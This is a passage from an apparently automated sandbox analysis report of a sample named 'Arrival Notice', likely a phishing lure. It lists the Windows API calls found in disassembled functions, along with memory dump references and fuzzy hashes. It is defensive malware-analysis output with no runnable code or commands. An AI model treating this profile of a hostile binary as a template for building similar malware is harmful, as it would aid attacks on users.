                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008F720E
                                              • __allrem.LIBCMT ref: 008F7225
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008F7243
                                              • __invoke_watson.LIBCMT ref: 008F72B4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                              • String ID:
                                              • API String ID: 384356119-0
                                              • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                              • Instruction ID: cb98adcfd6d0b827bc88b54009ec6f437519a0cfffd369ceac9761ca5d34408a
                                              • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                              • Instruction Fuzzy Hash: 2D71B671A04B1BABF7149E79CC41B7AB3A8FF54324F14422AFA15D66C1EB70DA508790
                                              APIs
                                              • _memset.LIBCMT ref: 00932A31
                                              • GetMenuItemInfoW.USER32(00996890,000000FF,00000000,00000030), ref: 00932A92
                                              • SetMenuItemInfoW.USER32(00996890,00000004,00000000,00000030), ref: 00932AC8
                                              • Sleep.KERNEL32(000001F4), ref: 00932ADA
                                              • GetMenuItemCount.USER32(?), ref: 00932B1E
                                              • GetMenuItemID.USER32(?,00000000), ref: 00932B3A
                                              • GetMenuItemID.USER32(?,-00000001), ref: 00932B64
                                              • GetMenuItemID.USER32(?,?), ref: 00932BA9
                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00932BEF
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00932C03
                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00932C24
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                              • String ID:
                                              • API String ID: 4176008265-0
                                              • Opcode ID: c8f7d0e87f83840a11aebd60eb2eea37f989a9221ae83be348248a3c963405e8
                                              • Instruction ID: c199c4941697658ff36fe33d20d1a1542c982ff397dbf29db4d35d7eeb345305
                                              • Opcode Fuzzy Hash: c8f7d0e87f83840a11aebd60eb2eea37f989a9221ae83be348248a3c963405e8
                                              • Instruction Fuzzy Hash: CC619DB0914249AFDB21CF64D888EBEBBB8EB41314F140599F841E7251E735AD45EF21
                                              APIs
                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00957214
                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00957217
                                              • GetWindowLongW.USER32(?,000000F0), ref: 0095723B
                                              • _memset.LIBCMT ref: 0095724C
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0095725E
                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009572D6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend$LongWindow_memset
                                              • String ID:
                                              • API String ID: 830647256-0
                                              • Opcode ID: 7336fedc0a3990dbb96a68bf5cdc1caca51f1fa7a7f5872f95f5870299cb1cf1
                                              • Instruction ID: ac6f11b6b43193d512bd3aad581d41397b2486c0c6d43ec2be7a75d5269169b6
                                              • Opcode Fuzzy Hash: 7336fedc0a3990dbb96a68bf5cdc1caca51f1fa7a7f5872f95f5870299cb1cf1
                                              • Instruction Fuzzy Hash: E9618B71904208AFDB10DFA9DC81EEEB7F8EB09710F14015AFE14A72A1D770AE45DBA0
                                              APIs
                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00927135
                                              • SafeArrayAllocData.OLEAUT32(?), ref: 0092718E
                                              • VariantInit.OLEAUT32(?), ref: 009271A0
                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 009271C0
                                              • VariantCopy.OLEAUT32(?,?), ref: 00927213
                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00927227
                                              • VariantClear.OLEAUT32(?), ref: 0092723C
                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00927249
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00927252
                                              • VariantClear.OLEAUT32(?), ref: 00927264
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0092726F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                              • String ID:
                                              • API String ID: 2706829360-0
                                              • Opcode ID: 49ce0514f20d76f30559703d9322ba5d2197bb3d960cbe1e959c271365c09b03
                                              • Instruction ID: de1e5fe39e6ff30410b9f3df429615becca7f91fa55ed1015bbdc1e413c51073
                                              • Opcode Fuzzy Hash: 49ce0514f20d76f30559703d9322ba5d2197bb3d960cbe1e959c271365c09b03
                                              • Instruction Fuzzy Hash: 65414135904229EFCF00EFA9D858DAEBBB9FF48355F008069F955E7261CB30A945DB90
                                              APIs
                                              • WSAStartup.WSOCK32(00000101,?), ref: 00945AA6
                                              • inet_addr.WSOCK32(?,?,?), ref: 00945AEB
                                              • gethostbyname.WSOCK32(?), ref: 00945AF7
                                              • IcmpCreateFile.IPHLPAPI ref: 00945B05
                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00945B75
                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00945B8B
                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00945C00
                                              • WSACleanup.WSOCK32 ref: 00945C06
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                              • String ID: Ping
                                              • API String ID: 1028309954-2246546115
                                              • Opcode ID: 9ee7a6f08287010709fb635efeab24b11f7f4034c8ec26765ba32cbd8265e03c
                                              • Instruction ID: e50c7be3d1dc556383e2263819fabdb752c261b92cbb99a419a13a533a6b2a4e
                                              • Opcode Fuzzy Hash: 9ee7a6f08287010709fb635efeab24b11f7f4034c8ec26765ba32cbd8265e03c
                                              • Instruction Fuzzy Hash: 1E5191316187009FD711AF65CC55F2ABBE4EF48720F15892AF556DB2A2DB74EC00DB42
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 0093B73B
                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0093B7B1
                                              • GetLastError.KERNEL32 ref: 0093B7BB
                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 0093B828
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Error$Mode$DiskFreeLastSpace
                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                              • API String ID: 4194297153-14809454
                                              • Opcode ID: dbd3d59a70ccb4d87171923f78643d462cda26225de34be39ccc7577312b07b5
                                              • Instruction ID: d2e8416881b0c4b3c043b22a4d290ca6ecf1c507f54509b98e43e7595cec6d0b
                                              • Opcode Fuzzy Hash: dbd3d59a70ccb4d87171923f78643d462cda26225de34be39ccc7577312b07b5
                                              • Instruction Fuzzy Hash: 02319335A00209AFDB10EF68C885ABE7BB8FF84754F14412AF602D7391DB759942CF91
                                              APIs
                                                • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                • Part of subcall function 0092B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0092B0E7
                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 009294F6
                                              • GetDlgCtrlID.USER32 ref: 00929501
                                              • GetParent.USER32 ref: 0092951D
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00929520
                                              • GetDlgCtrlID.USER32(?), ref: 00929529
                                              • GetParent.USER32(?), ref: 00929545
                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00929548
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 1536045017-1403004172
                                              • Opcode ID: 5845f50df6613dd662ee221d49fa8e799e0ef0fbb7bc020be6960917b409539f
                                              • Instruction ID: 769943ab54caec7f6ff8059178a641af7aeb5f3aabee278c0e6d40ad7762a3b0
                                              • Opcode Fuzzy Hash: 5845f50df6613dd662ee221d49fa8e799e0ef0fbb7bc020be6960917b409539f
                                              • Instruction Fuzzy Hash: 70210670A00218BBCF01AB65DC95EFEBBB8FF45310F100116B962972E6DB755919DB20
                                              APIs
                                                • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                • Part of subcall function 0092B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0092B0E7
                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009295DF
                                              • GetDlgCtrlID.USER32 ref: 009295EA
                                              • GetParent.USER32 ref: 00929606
                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00929609
                                              • GetDlgCtrlID.USER32(?), ref: 00929612
                                              • GetParent.USER32(?), ref: 0092962E
                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00929631
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 1536045017-1403004172
                                              • Opcode ID: 76743fb12b14714d8494e31a151680f3df6ddefbd8b3770442c3b979c23fe272
                                              • Instruction ID: d1b709a7c2ac5996ab6bda0355e8b85ed949f506ec1d9463741d04511315c3d6
                                              • Opcode Fuzzy Hash: 76743fb12b14714d8494e31a151680f3df6ddefbd8b3770442c3b979c23fe272
                                              • Instruction Fuzzy Hash: 3C21D474A00218BBDF01AB65DCD5EFEBBB8FF48310F140116F921972A5DB759919DB20
                                              APIs
                                              • GetParent.USER32 ref: 00929651
                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00929666
                                              • _wcscmp.LIBCMT ref: 00929678
                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009296F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameParentSend_wcscmp
                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                              • API String ID: 1704125052-3381328864
                                              • Opcode ID: acb8e61dea35252b6bb143b76d1e93f6ebb7c438d13fe359ca41106c0b00a68f
                                              • Instruction ID: 9b85fdc53e51227ccee87ac7a825af1438f0b540e1b4abb5cc51f1ec4d3c5137
                                              • Opcode Fuzzy Hash: acb8e61dea35252b6bb143b76d1e93f6ebb7c438d13fe359ca41106c0b00a68f
                                              • Instruction Fuzzy Hash: 5111067624832BBAFA013635FC1ADB677DCDF05374F200026FE01E50D5FEA5A9505A59
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00948BEC
                                              • CoInitialize.OLE32(00000000), ref: 00948C19
                                              • CoUninitialize.OLE32 ref: 00948C23
                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00948D23
                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00948E50
                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00962C0C), ref: 00948E84
                                              • CoGetObject.OLE32(?,00000000,00962C0C,?), ref: 00948EA7
                                              • SetErrorMode.KERNEL32(00000000), ref: 00948EBA
                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00948F3A
                                              • VariantClear.OLEAUT32(?), ref: 00948F4A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                              • String ID:
                                              • API String ID: 2395222682-0
                                              • Opcode ID: 078895433c47e226ff48036c842008af77756b791e575afb498e5a9ab9a3a815
                                              • Instruction ID: c7dd7df549d036c372a96f49be5f59a1f52041313a0dd576c23e1fea4b70dfa5
                                              • Opcode Fuzzy Hash: 078895433c47e226ff48036c842008af77756b791e575afb498e5a9ab9a3a815
                                              • Instruction Fuzzy Hash: 4FC1F071608305AFC700EF68C88492BB7E9FF89758F00496DF58A9B251DB71ED05CB52
                                              APIs
                                              • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00937CF6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ArraySafeVartype
                                              • String ID:
                                              • API String ID: 1725837607-0
                                              • Opcode ID: e30624dfdaf7186739abf27ce951dee9908d0c3b75bdbc47f8d3247bb29819cd
                                              • Instruction ID: 820b5e2259bf2f284be26589d475620bdf408033fc79e38ea52d0b3c2892403c
                                              • Opcode Fuzzy Hash: e30624dfdaf7186739abf27ce951dee9908d0c3b75bdbc47f8d3247bb29819cd
                                              • Instruction Fuzzy Hash: 94B17DB190821A9FDB20DFE8C485BBEB7B8FF49321F204469E650E7291D7349941CFA1
                                              APIs
                                              • __swprintf.LIBCMT ref: 0093419D
                                              • __swprintf.LIBCMT ref: 009341AA
                                                • Part of subcall function 008F38D8: __woutput_l.LIBCMT ref: 008F3931
                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 009341D4
                                              • LoadResource.KERNEL32(?,00000000), ref: 009341E0
                                              • LockResource.KERNEL32(00000000), ref: 009341ED
                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 0093420D
                                              • LoadResource.KERNEL32(?,00000000), ref: 0093421F
                                              • SizeofResource.KERNEL32(?,00000000), ref: 0093422E
                                              • LockResource.KERNEL32(?), ref: 0093423A
                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0093429B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                              • String ID:
                                              • API String ID: 1433390588-0
                                              • Opcode ID: 828cf22486969beb7b215c12728f09913f0611109d2ac4daf0654797829a7035
                                              • Instruction ID: d5ec9c966c69c508ba9a08144c8d9f814ba61fc9e654edd14841ffbacc5aace1
                                              • Opcode Fuzzy Hash: 828cf22486969beb7b215c12728f09913f0611109d2ac4daf0654797829a7035
                                              • Instruction Fuzzy Hash: 2431CEB161920AABCB019FA1DC98EBF7BACEF04311F014425F925E2150E734EA519BA1
                                              APIs
                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008DFC06
                                              • OleUninitialize.OLE32(?,00000000), ref: 008DFCA5
                                              • UnregisterHotKey.USER32(?), ref: 008DFDFC
                                              • DestroyWindow.USER32(?), ref: 00914A00
                                              • FreeLibrary.KERNEL32(?), ref: 00914A65
                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00914A92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                              • String ID: close all
                                              • API String ID: 469580280-3243417748
                                              • Opcode ID: fb25c7e42c3ff76d52a0c16ab991eb7941b2440abb08172edc0fecd67e53f14e
                                              • Instruction ID: 045412f97ded9cc562f4f9e51cad1458d5bf8c1480acc2583d1d4e6037401576
                                              • Opcode Fuzzy Hash: fb25c7e42c3ff76d52a0c16ab991eb7941b2440abb08172edc0fecd67e53f14e
                                              • Instruction Fuzzy Hash: 47A16A307012268FCB29EF15C494B69F768FF08710F1542AEE90AEB262DB30AD56DF55
                                              APIs
                                              • EnumChildWindows.USER32(?,0092AA64), ref: 0092A9A2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ChildEnumWindows
                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                              • API String ID: 3555792229-1603158881
                                              • Opcode ID: fd188792b2617ec4aa8eccd762cc6a5faa45d116f836392e08cc4ff7d3d460bd
                                              • Instruction ID: 478fc39edc082877840723c54fcc61787560e1a157895c08a639b7b1f05c0c38
                                              • Opcode Fuzzy Hash: fd188792b2617ec4aa8eccd762cc6a5faa45d116f836392e08cc4ff7d3d460bd
                                              • Instruction Fuzzy Hash: 7B91C53190061ADBCB18EF74D481BF9FB78FF04304F508129D98AE7245DB306999CBA2
                                              APIs
                                              • SetWindowLongW.USER32(?,000000EB), ref: 008D2EAE
                                                • Part of subcall function 008D1DB3: GetClientRect.USER32(?,?), ref: 008D1DDC
                                                • Part of subcall function 008D1DB3: GetWindowRect.USER32(?,?), ref: 008D1E1D
                                                • Part of subcall function 008D1DB3: ScreenToClient.USER32(?,?), ref: 008D1E45
                                              • GetDC.USER32 ref: 0090CF82
                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0090CF95
                                              • SelectObject.GDI32(00000000,00000000), ref: 0090CFA3
                                              • SelectObject.GDI32(00000000,00000000), ref: 0090CFB8
                                              • ReleaseDC.USER32(?,00000000), ref: 0090CFC0
                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0090D04B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                              • String ID: U
                                              • API String ID: 4009187628-3372436214
                                              • Opcode ID: 6d8dc0140cbe3fa13fc4fbb30fb7877f36be43c70e4169a9e6af1ca4cb3029b9
                                              • Instruction ID: 961702889541f84b5b191a63f341b3418c1501f192eca46db7057a2f2274e96d
                                              • Opcode Fuzzy Hash: 6d8dc0140cbe3fa13fc4fbb30fb7877f36be43c70e4169a9e6af1ca4cb3029b9
                                              • Instruction Fuzzy Hash: 9871F771500205EFCF21DF64C884ABA7BBAFF48364F14436AED55962A6C7318C41DF61
                                              APIs
                                                • Part of subcall function 008D2612: GetWindowLongW.USER32(?,000000EB), ref: 008D2623
                                                • Part of subcall function 008D2344: GetCursorPos.USER32(?), ref: 008D2357
                                                • Part of subcall function 008D2344: ScreenToClient.USER32(009967B0,?), ref: 008D2374
                                                • Part of subcall function 008D2344: GetAsyncKeyState.USER32(00000001), ref: 008D2399
                                                • Part of subcall function 008D2344: GetAsyncKeyState.USER32(00000002), ref: 008D23A7
